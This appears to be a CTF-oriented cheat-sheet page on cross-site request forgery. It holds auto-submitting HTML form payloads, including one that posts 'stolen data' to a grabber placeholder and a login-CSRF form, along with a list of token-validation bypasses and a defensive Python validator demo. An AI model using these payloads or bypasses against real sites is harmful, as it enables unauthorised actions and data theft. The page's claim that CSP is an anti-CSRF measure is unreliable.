Cross-Site Request Forgery


Fundamentally, Cross-Site Request Forgery (CSRF) refers to using the session of a user who is logged in to a website to perform API calls without their consent, for instance an API call that changes their password.

If a cookie was set with SameSite=None, which is not the default, the browser attaches it to cross-site requests, so it can be exploited from any site.

Many modern browsers have built-in anti-CSRF measures, such as the Content-Security-Policy header (refer to CSP).

XSS is a common technique to perform a CSRF attack, by injecting a form that automatically submits itself.

📚 During CTFs, it may take between one and five minutes.

You can find payloads on PayloadsAllTheThings/CSRF. You can test the payload with an HTTP Requests Grabber first during CTFs.

<!-- Payload 1: form that submits itself as soon as the page loads -->
<form id="autosubmit" action="https://<target_form_URL>" method="post">
  <input type="text" name="xxx" value="yyy" hidden>
  <button type="submit">Submit</button>
</form>
<script>
  document.getElementById("autosubmit").submit();
</script>

<!-- Payload 2: form whose value is filled in by script before being posted to a grabber (refer to stealing cookies) -->
<form id="fdata" action="//refer/to/stealing/cookies" method="POST">
  <input type="hidden" id="data" name="data" value="nop" />
  <input type="submit" value="Submit" />
</form>
<script defer>
  document.getElementById('data').value = 'stolen data';
  document.getElementById('fdata').submit();
</script>

Anti-CSRF Token


Some websites have a CSRF token, mostly attached to HTML forms, as protection against CSRF attacks and automation tools.

It's a generated value that is added to the form, often as a hidden HTML <input> field. It proves that whoever submits the form actually visited the page containing the form beforehand, since a third-party site cannot read the token.

CSRF tokens should be generated with a cryptographically secure random generator. Do not use md5(username) or similar guessable token generation functions.

Many tools have built-in switches to handle/bypass such forms.

A few other inappropriate validation settings:

  • The server only checks whether the token header is present, not its value
  • The server only checks the length of the token
  • The server only checks the token if one was sent (omitting it skips the check)
  • We can use someone else's CSRF token (the token is not bound to the session)
  • We can reuse a CSRF token (the token is never rotated)
  • Verb tampering (e.g. switching POST to GET) may bypass CSRF verification

There is also the Double-Submit Cookie Pattern, but it can be bypassed by giving the same arbitrary value to both the cookie and the header, provided the attacker can set a cookie on the victim's browser (for example from a subdomain).
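As an added example (not part of these notes), a minimal Python validator that reproduces the weak checks listed above next to a hardened one that binds the token to the session, compares it in constant time, requires it on every state-changing verb and rotates it after use; the in-memory session store and token format are constructed for the demo:

```python
import hmac
import secrets

# Constructed in-memory session store: session id -> session data (demo only).
SESSIONS: dict[str, dict] = {}


def new_session() -> str:
    """Create a session with its own cryptographically random anti-CSRF token."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"csrf_token": secrets.token_urlsafe(32)}
    return sid


def weak_check(session_id: str, method: str, form: dict) -> bool:
    """Deliberately weak validator reproducing the mistakes listed above."""
    if method != "POST":            # verb tampering: a GET never reaches the check
        return True
    token = form.get("csrf_token")
    if token is None:               # only checks the token if one was sent
        return True
    # Only checks the length: any well-formed token passes, including another
    # session's token, and the same token can be replayed forever.
    return len(token) == 43         # token_urlsafe(32) yields 43 characters


def strict_check(session_id: str, method: str, form: dict) -> bool:
    """Hardened validator: reject safe verbs, missing tokens, foreign tokens and reuse."""
    if method in ("GET", "HEAD", "OPTIONS"):
        return False                # state changes are never accepted on safe verbs
    session = SESSIONS.get(session_id)
    token = form.get("csrf_token")
    if session is None or not isinstance(token, str):
        return False                # a missing token is a failure, not a skipped check
    # Constant-time comparison against the token bound to *this* session.
    if not hmac.compare_digest(token, session["csrf_token"]):
        return False
    # Rotate on success so a captured token cannot be replayed.
    session["csrf_token"] = secrets.token_urlsafe(32)
    return True


if __name__ == "__main__":
    victim, attacker = new_session(), new_session()
    foreign = SESSIONS[attacker]["csrf_token"]
    print("weak, no token:       ", weak_check(victim, "POST", {}))
    print("weak, foreign token:  ", weak_check(victim, "POST", {"csrf_token": foreign}))
    print("strict, foreign token:", strict_check(victim, "POST", {"csrf_token": foreign}))
```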


Additional Payloads

Login form

<!-- Login CSRF: submits a form with attacker-chosen credentials as soon as the page loads -->
<form id="autosubmit" action="URL" method="post">
  <input name="username" value="toto">
  <input name="password" value="toto">
  <button type="submit" class="btn btn-default">Submit</button>
</form>
<script>
  document.getElementById("autosubmit").submit();
</script>